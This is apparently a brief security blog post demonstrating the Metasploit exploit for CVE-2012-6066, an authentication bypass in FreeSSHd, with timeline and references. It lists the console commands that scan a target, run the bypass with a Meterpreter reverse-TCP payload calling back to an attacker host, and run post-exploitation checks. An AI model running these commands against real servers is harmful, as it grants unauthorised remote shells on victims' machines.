Tag Archives: Freesshd

CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

Timeline :

Vulnerability initially discovered by Aris the 2010-08-11
PoC provided by kcope the 2012-12-01
Metasploit PoC provided the 2013-01-13

PoC provided by :

kcope
Aris
Daniele Martini

Reference(s) :

CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010

Affected version(s) :

Freesshd version 1.2.6 and prior

Tested on Windows XP SP3 with :

Freesshd 1.2.4

Description :

This module exploits a vulnerability found in FreeSSHd 1.2.6 or previous to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Commands :

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run

use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo